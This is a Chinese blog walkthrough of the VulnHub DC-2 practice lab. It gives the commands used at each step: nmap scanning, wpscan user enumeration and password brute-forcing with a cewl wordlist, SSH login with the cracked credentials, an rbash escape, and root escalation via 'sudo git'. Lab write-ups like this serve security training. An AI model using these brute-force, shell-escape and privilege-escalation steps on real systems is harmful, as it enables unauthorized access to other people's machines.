vulnhub:DC-2

最新推荐文章于 2024-08-26 17:30:48 发布
最新推荐文章于 2024-08-26 17:30:48 发布
阅读量1.1k 收藏 17
点赞数 31
文章标签: 网络安全 安全 系统安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69670995/article/details/139343184
版权

1.环境搭建

靶机下载地址:DC: 2 ~ VulnHub

在Oracle VM VirtualBox中打开靶机,将靶机网络设置为仅主机模式,和kali使用同一网卡

开启靶机

2.渗透过程

使用ip a 命令查看kali的ip地址

ip a

使用nmap命令扫描开启的主机

nmap -sn 192.168.56.0/24

发现靶机IP地址,使用nmap工具扫描靶机端口

nmap -sS 192.168.56.112 -p-

发现80端口(http),和7744端口使用浏览器访问

http://192.168.56.112

访问失败,这里需要在/etc/hosts文件中添加dns

vim /etc/hosts

192.168.56.112 dc-2

添加成功后再次使用浏览器访问

访问成功,这里有一个flag,点开

发现flag1,这里提示使用cewl工具创建字典,然后爆破密码,使用dirb工具扫描目录

dirb http://dc-2/

发现wp-amdin目录,使用浏览器访问

http://dc-2/wp-admin

自动跳转到了一个登陆页面,使用flag1中的提示工具cewl爬取网站,创建字典

cewl http://dc-2/ -w passwd.txt

成功创建字典,这里可以看一下字典中的内容

爆破需要用户名,发现登陆页面是wordpress,这里使用wpscan扫描工具爆破用户名

wpscan --url http://dc-2 -e u

这里爆破出来了三个用户名(admin,jerry.tom),因为太长就不一 一截图了,将这三个用户名写如users.txt文件中

vim users.txt

使用wpscan工具爆破登陆密码

wpscan --url http://dc-2 -U users.txt -P passwd.txt

爆破出来两组用户名密码(jerry/adipiscing, tom/parturient),还可以使用burp去爆破,这里就不演示了,使用jerry用户登陆web

发现了flag2,点开查看flag2

提示wordpress中没有什么东西了,扫描端口的时候发现了7744端口,使用nmap扫描一下7744端口是什么服务

nmap -A 192.168.56.112 -p 7744

发现是ssh服务,尝试使用爆破出来的用户名和密码进行ssh连接(使用另一个没有用到的用户)

ssh tom@192.168.56.112 -p 7744

ls

连接成功, ls发现flag3.txt,使用cat查看其内容

cat flag3.txt

这里使用了rbash限制,需要绕过rbash限制

BASH_CMDS[x]=/bin/sh

x

export PATH=$PATH:/bin

export PATH=$PATH:/usr/bin

使用cat命令查看flag3.txt内容

cat flag3.txt

使用find查找一下flag4

find / -name "*flag4*"

发现在jerry中的根目录下,使用su切换用户

su jerry

使用cat命令查看其内容

cat flag4.txt

flag5.txt应该是需要提权,在root目录下

使用sudo命令查看一下特殊权限

sudo -l

发现了git,这里使用git提权

sudo git help config

在末行输入!/bin/bash,然后回车

!/bin/bash

完成提权

进入root目录查看一下flag

cd /root

ls

cat final-flag.txt

实验结束

GJyt
关注
  • 31
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3640
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
VulnhubDC-2
imawuya的博客
01-18 745
VulnhubDC-2靶场通关记录
vulnhub实战:DC-2
huangyongkang666的博客
04-25 2303
vulnhub实战:DC-2 1.DC-2介绍 描述 与DC-1非常相似,DC-2是另一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 与原始DC-1一样,它在设计时考虑了初学者的需求。 Linux技能和对Linux命令行的熟悉程度是必须的,基本的渗透测试工具的一些经验也是必须的。 就像DC-1一样,有五个标志,包括最后一个标志。 同样,就像DC-1一样,标志对初学者很重要,但对那些有经验的人来说并不那么重要。 简而言之,唯一真正重要的标志是最后一面旗帜。 对于初学者来说,谷歌是你的朋友。好吧
Vulnhub靶机:DC-1渗透详细过程
菜鸟学渗透
04-01 763
Vulnhub靶机:DC-1渗透详细过程
Vulnhub-DC-2实战靶场
ierciyuan的博客
10-27 1628
vulnhubdc-2靶场。信息收集、漏洞利用等,详细的分步打靶。
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4507
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
vulnhub靶机:DC-2
Keepb1ue的博客
09-29 2642
靶机配置说明 靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/ 靶机:DC1 (VirtualBox) IP:192.168.56.111 攻击机:Kali(VMware) IP:192.168.56.108 在下载地址中也有详细的靶机说明,而FunBox需要寻找的flag总数为5个 靶机环境配置: 还是一样,将其桥接到同一张网卡即可。 靶机渗透开始: kali IP: 第一步还是需要确定目标IP 确定目标ip为192.168.56.111后nmap扫描下端
Vulnhub - DC-1
qq_46081990的博客
03-14 392
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
Vulnhub:DC-2靶机
qq_43884092的博客
04-02 57
wpscan收集目标wordpress用户,使用cewl收集目标网站信息生成字典,爆破目标wordpress用户密码,使用vi编辑器绕过rbash,git提权
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2487
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3006
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1946
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8429
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
如何使用双重IP代理实现更安全的网络访问
最新发布
IPIPGO的博客
08-26 561
双重IP代理,顾名思义,就是在原有的代理IP基础上,再添加一层代理。这样,当你访问目标网站时,数据会先经过第一个代理服务器,再经过第二个代理服务器,最后到达目标网站。这种方式不仅能更好地保护你的隐私,还能有效防止IP被封禁。通过本文的介绍,相信你已经掌握了如何使用Java实现双重IP代理的方法。双重IP代理不仅能帮助我们更好地保护隐私,还能有效防止IP被封。在实际应用中,合理使用双重代理IP,将会使你的网络访问更加安全和高效。希望本文对你有所帮助,祝你在网络技术的道路上越走越远!t=N7T8。
四合一气体检测仪:全能守护,安全无忧的创新之选
2201_75812475的博客
08-26 392
它采用先进的传感器技术,能够快速响应并准确测量目标气体的浓度,即使在复杂多变的环境中也能保持稳定的性能。同时,设备内置的高精度算法能够智能分析数据,一旦检测到有害气体浓度超过预设的安全阈值,便会立即发出声光报警,甚至自动启动联动装置(如排风扇、切断阀等),以快的速度控制险情,确保人员安全。四合一气体检测仪,顾名思义,能够同时检测并显示四种不同有害气体的浓度,这通常包括可燃气体(如甲烷、丙烷等)、有毒气体(如一氧化碳、硫化氢)、氧气含量以及可能存在的其他特定有害气体(如二氧化碳、氨气等,具体依据型号而定)。
主机安全-网络攻击监测
关注网络安全、云原生安全
08-24 1374
本文介绍主机网络层面上的攻击场景,每种攻击场景举一个例子。监测方面以字节跳动的开源HIDS elkeid举例。针对网络攻击,通常可以考虑从以下方面做规则来源ip:针对异常ip,有访问即告警。访问端口:针对高危端口,有访问即告警。访问频率:针对过多的访问,在一段时间内超过频率即告警。例如,对同一端口或多个端口。
【宝马中国-注册/登录安全分析报告】
08-26 1453
宝马中国作为全世界最成功的汽车和摩托车制造商之一的宝马集团旗下公司, 其滑动验证码没有采用市场常用的几家, 有独特的地方, 背景图在被抠出后,并不是采用同行的常用的透明化保留原有图形样式,而是填充白色,所以滑块位置识别需要从背景图中提取, 这样让识别变得更简单,造成这中特点有两方面原因,1 直接填充白色背景的技术比透明度的方式更简单2 从报文看未获取轨迹数据, 显示验证方式中并未验证轨迹,只验证距离是否合适很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值